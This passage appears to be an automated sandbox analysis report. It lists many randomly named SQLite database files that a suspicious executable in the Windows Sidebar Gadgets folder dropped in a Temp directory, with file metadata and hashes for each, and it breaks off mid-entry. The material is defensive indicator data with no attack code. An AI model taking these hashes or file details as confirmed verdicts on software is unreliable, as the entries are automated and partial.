                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\KmMKmoiL2C

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):0.5712781801655107
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Kv12yoQJY2

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):114688
                                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\LBtwxGxEuo

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):159744
                                                                                                                                                                  Entropy (8bit):0.7873599747470391
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                  MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                  SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                  SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                  SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\LFpuzJcXE4

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\LTk6PkdZlU

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\LsrR2fYftu

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):0.5712781801655107
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\LuDwTvFshn

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):126976
                                                                                                                                                                  Entropy (8bit):0.47147045728725767
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                  MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                  SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                  SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                  SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\LvK1AZiWEt

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):0.5707520969659783
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\LyzkFygtQK

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\MF7TR74ULs

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\MI97f07IyB

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\MRffVeY2qh

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):114688
                                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\MUSzuGce4J

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):126976
                                                                                                                                                                  Entropy (8bit):0.47147045728725767
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                  MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                  SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                  SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                  SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\N5FvLANxEE

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\N7zhcTI5eL

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\N9Ig8hBTzR

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\NAzm8sFcDu

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\NBPxstknJB

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):159744
                                                                                                                                                                  Entropy (8bit):0.7873599747470391
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                  MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                  SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                  SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                  SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\NEd1oySSyN

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):114688
                                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\NS8NKbcqQj

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
